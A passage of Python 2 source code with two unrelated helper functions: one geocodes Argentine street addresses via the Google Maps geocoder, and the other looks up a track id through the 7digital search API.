    Geocode a street address in Argentina via the Google geocoder.

    The query is "<calle> <numero>, <ciudad_slug>, Argentina". Only results
    whose types include "street_address" are kept. Returns one dict per kept
    result with the keys 'nombre' (formatted address), 'precision' (always 1),
    'geom' ("POINT(lng lat)") and 'tipo' ("direccionPostal").
    """
    # http://stackoverflow.com/questions/9884475/using-google-maps-geocoder-from-python-with-urllib2
    import urllib2
    import json

    address = calle + " " + numero + ", " + ciudad_slug + ", Argentina"
    address = urllib2.quote(address.encode('utf8'))
    geocode_url = "http://maps.googleapis.com/maps/api/geocode/json?language=es&address=%s&sensor=false" % address
    res = json.loads(urllib2.urlopen(geocode_url).read())

    # Convert each street-level geocoder result into the structure used by
    # callers.
    ret = []
    for hit in res["results"]:
        if "street_address" not in hit["types"]:
            continue
        nombre = hit["formatted_address"]
        geom = "POINT(" + str(hit["geometry"]["location"]["lng"]) + " " + str(hit["geometry"]["location"]["lat"]) + ")"
        ret.append({
            'nombre' : nombre,
            'precision': 1,
            'geom' : geom,
            'tipo' : "direccionPostal"
        })
    return ret
def get_trackid_from_text_search(title,artistname=''):
    """
    Search for an artist + title using 7digital search API
    Return None if there is a problem, or tuple (title,trackid)

    The query is `title`, prefixed with `artistname` and a space when an
    artist is given. The first track of the first search result is used.
    """
    url = 'http://api.7digital.com/1.2/track/search?'
    url += 'oauth_consumer_key='+DIGITAL7_API_KEY

    if artistname == '':
        query = title
    else:
        query = artistname + ' ' + title
    url += '&q='+urllib2.quote(query)

    xmldoc = url_call(url)
    if xmldoc.getAttribute('status') != 'ok':
        return None

    hits = xmldoc.getElementsByTagName('searchResult')
    if len(hits) == 0:
        return None

    track = hits[0].getElementsByTagName('track')[0]
    tracktitle = track.getElementsByTagName('title')[0].firstChild.data
    trackid = int(track.getAttribute('id'))
    return (tracktitle,trackid)